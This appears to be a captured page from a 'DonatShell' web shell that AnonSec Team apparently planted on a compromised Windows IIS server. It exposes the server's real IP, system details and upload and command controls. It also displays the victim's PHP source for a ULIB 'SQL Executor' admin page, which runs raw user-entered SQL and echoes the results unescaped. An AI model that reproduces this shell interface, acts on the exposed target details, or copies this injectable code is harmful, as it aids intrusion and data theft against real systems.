DonatShell
Server IP : 180.180.241.3  /  Your IP : 216.73.216.252
Web Server : Microsoft-IIS/7.5
System : Windows NT NETWORK-NHRC 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /AppServ/www/umedia3/root.sqlexec/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /AppServ/www/umedia3/root.sqlexec/index.php
<?php
	; 
		
        include ("../inc/config.inc.php");
		head();
        mn_root("sqlexec");


			pagesection("SQL Executor");

?><BR><TABLE align=center width=550>

<TR>
		<TD align=center>
<?
//echo "<PRE>$sqlentered</PRE><HR>";
if ($issave=="yes") {
	filelogs("sql executor",$sqlentered,"SQLEXEC");
	$s=tmq($sqlentered);
	/////////////////////
	?><TABLE width=550 bgcolor=666666 cellpadding=1 cellspacing=1>
	<TR bgcolor=FFFFFF><TD colspan="10"><B>ROWS=<?echo number_format(tmq_num_rows($s));?></B></TD></TR>
	<TR bgcolor=#A0A0A0>
	<TD width=20><B>#</B></TD>
	<? while ($i < mysql_num_fields($s)) {
		$meta = mysql_fetch_field($s, $i);?>
		<TD><B><? echo $meta->name;?></B></TD>
	<?
		$i++;
		} ?>
	</TR>
	<? 
	$s=tmq($sqlentered);
	$icount=0;
	while ($row=tmq_fetch_array($s)) {	
		$icount++;
		if ($icount>=3500) {
			?><TD colspan=10><B>DIE; via icount>=3500</B></TD><?
		}
	?>
	<TR bgcolor=FFFFFF>
	<TD><B><? echo $icount;?></B></TD>
	<? for ($i=0;$i<=mysql_num_fields($s);$i++) {?>
		<TD><?echo $row[$i]?></TD>
	<? } ?>
	</TR>
	<?
	}?>
	</TABLE><?



	/////////////////////
}
?></TD>
</TR>

<TR>
<FORM METHOD=POST ACTION="index.php">
		<TD align=center>
		<INPUT TYPE="hidden" name=issave value="yes">
<TEXTAREA NAME="sqlentered" ROWS="8" COLS="64"><? echo $sqlentered?></TEXTAREA><BR>
<INPUT TYPE="submit" value=" EXEC SQL ">
</TD>
	</FORM>
</TR>


<TR>
	<TD>
<BR><BR>
<HR>
<? echo getlang("<B>หมายเหตุ</B> ใส่ครั้งละ 1 คำสั่งเท่านั้น <BR>
คำสั่งทั้งหมดจะถูกบันทึกไว้อ้างอิงภายหลัง และ การใช้คำสั่งผิด อาจทำให้เกิด<BR>ความเสียหายกับระบบได้
<BR><BR>
หากเกิดความเสียหายกับระบบ โดยการใช้คำสั่งที่ไม่ถูกต้อง จะไม่อยู่ในความรับผิดชอบ<BR>
ของทีมงานผู้พัฒนาฯ <B>และขอแนะนำให้ ทำการสำรองข้อมูลก่อนการใช้คำสั่งทุกครั้ง!</B>::l::<B>Note</B> Only 1 command per time <BR>
all command will be loged to log file and some command may caused system work incorrectly.
<BR><BR>
Any error or data-losing by command enterd by administrator is not responsible of ULIB developer team<BR>
 <B>We recommended to full backup database befor use any command!</B>"); ?>

</TD>
</TR>
</TABLE><BR><?
foot();
?>

Anon7 - 2022
AnonSec Team